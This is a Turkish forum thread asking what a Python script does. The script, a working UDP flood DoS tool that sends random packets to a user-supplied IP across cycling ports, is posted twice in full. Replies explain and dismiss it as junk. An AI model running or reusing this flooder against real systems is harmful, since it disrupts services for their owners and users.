Python kodu ne işe yapıyor?

  • Konuyu başlatan Mete0
  • Başlangıç Tarihi
  • Mesaj 4
  • Görüntüleme 869

Mete0

Femtopat
Katılım
13 Aralık 2020
Mesajlar
28
Daha fazla  
Cinsiyet
Erkek
Buraya ne yazmışalar?

Python:
import sys

import os

import time

import socket

import random

#Code Time

from datetime import datetime

now = datetime.now()

hour = now.hour

minute = now.minute

day = now.day

month = now.month

year = now.year



##############

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

bytes = random._urandom(1490)

#############



os.system("clear")

os.system("figlet DDos Attack")

print

print "Author   : HA-MRX"

print "You Tube : https://www.youtube.com/c/HA-MRX"

print "github   : Ha3MrX - Overview"

print "Facebook : Facebook"

print

ip = raw_input("IP Target : ")

port = input("Port       : ")



os.system("clear")

os.system("figlet Attack Starting")

print "[                    ] 0% "

time.sleep(5)

print "[=====               ] 25%"

time.sleep(5)

print "[==========          ] 50%"

time.sleep(5)

print "[===============     ] 75%"

time.sleep(5)

print "[====================] 100%"

time.sleep(3)

sent = 0

while True:

     sock.sendto(bytes, (ip,port))

     sent = sent + 1

     port = port + 1

     print "Sent %s packet to %s throught port:%s"%(sent,ip,port)

     if port == 65534:

       port = 1
 
Kod şeklinde paylaşın lütfen.

 
Python:
import sys

import os

import time

import socket

import random

#Code Time

from datetime import datetime

now = datetime.now()

hour = now.hour

minute = now.minute

day = now.day

month = now.month

year = now.year



##############

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

bytes = random._urandom(1490)

#############



os.system("clear")

os.system("figlet DDos Attack")

print

print "Author : HA-MRX"

print "You Tube : https://www.youtube.com/c/HA-MRX"

print "github : Ha3MrX - Overview"

print "Facebook : Facebook"

print

ip = raw_input("IP Target : ")

port = input("Port : ")



os.system("clear")

os.system("figlet Attack Starting")

print "[ ] 0% "

time.sleep(5)

print "[===== ] 25%"

time.sleep(5)

print "[========== ] 50%"

time.sleep(5)

print "[=============== ] 75%"

time.sleep(5)

print "[====================] 100%"

time.sleep(3)

sent = 0

while True:

sock.sendto(bytes, (ip,port))

sent = sent + 1

port = port + 1

print "Sent %s packet to %s throught port:%s"%(sent,ip,port)

if port == 65534:

port = 1

Sözde bir DDoS aracı yazılmış. Gereksiz bir şey.
 
Son düzenleme:

İlk terminale figletli yeri gönderiyor sonra sock. Send ile birazda kod veri gönderiyor kısaca çöp bir dos.

DDoS
 
Artı -1 Eksi
Bu siteyi kullanmak için çerezler gereklidir. Siteyi kullanmaya devam etmek için çerezleri kabul etmelisiniz. Daha Fazlasını Öğren.…